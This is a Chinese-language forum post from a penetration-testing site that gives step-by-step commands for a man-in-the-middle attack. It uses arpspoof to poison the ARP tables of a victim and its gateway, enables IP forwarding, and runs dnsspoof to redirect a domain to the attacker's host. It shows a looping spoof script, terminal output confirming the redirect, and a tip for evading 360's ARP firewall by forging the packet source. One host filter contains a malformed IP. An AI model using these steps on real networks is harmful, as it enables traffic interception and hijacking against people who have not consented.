中国网络渗透测试联盟

标题: 通过DNS欺骗突破ARP防火墙的简单步骤 [打印本页]

作者: admin 时间: 2012-12-31 10:15
标题: 通过DNS欺骗突破ARP防火墙的简单步骤
测试下DNS欺骗能否成功吧： ~# netstat -r Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 5.5.5.0 * 255.255.255.0 U 0 0 0 eth0 link-local * 255.255.0.0 U 0 0 0 eth0 default 1.1.1.2 0.0.0.0 UG 0 0 0 eth0 ~# a

-

　　
先测试下DNS欺骗能否成功吧：

~# netstat -r
Kernel IP routing table
Destination    Gateway       Genmask       Flags MSS Window  irtt Iface
5.5.5.0       *             255.255.255.0 U       0 0       0 eth0
link-local    *             255.255.0.0    U       0 0       0 eth0
default       1.1.1.2       0.0.0.0       UG       0 0       0 eth0
~# arpspoof 1.1.1.2 -t 1.1.1.5 /终端1
~# arpspoof 1.1.1.5  -t 1.1.1.2    /终端2
~# echo 1 > /proc/sys/net/ipv4/ip_forward /转发
打开arp防火墙后发现有动静即算成功
复制代码

欺骗下dns 不停的发包吧~~~
~# cat baidu
1.1.1.4  www.political-security.com  /1.1.1.4本机的
~# dnsspoof -f baidu host 1.1.1.1.5 and udp  port 53
~#cat send /继续不停的发包~~~
arpspoof 1.1.1.5 -t 1.1.1.2
arpspoof 1.1.1.2 -t 1.1.1.5
~# screen ./send
[1]+  Stopped                screen ./send
~#screen ./send
[2]+  Stopped                screen ./send    /多做几次就可以射了
~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~
~#screen -ls  /看下进程
There are screens on:
      3754.pts-7.TzSec Team       (11/01/2012 12:21:47 AM)       (Detached)
      3750.pts-7.TzSec Team       (11/01/2012 12:21:46 AM)       (Detached)
      3746.pts-7.TzSec Team       (11/01/2012 12:21:44 AM)       (Detached)
      3742.pts-7.TzSec Team       (11/01/2012 12:21:41 AM)       (Detached)
      3722.pts-4.TzSec Team       (11/01/2012 12:21:21 AM)       (Attached)
6 Sockets in /var/run/screen/S-root.
~#
下面就是转到win下
ping www.political-security.com
Pinging www.political-security.com [1.1.1.4] with 32 bytes of data:

Reply from 1.1.1.4: bytes=32 time<1ms TTL=64
Reply from 1.1.1.4: bytes=32 time<1ms TTL=64
复制代码

对于360应该伪装下发包源就可以了

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)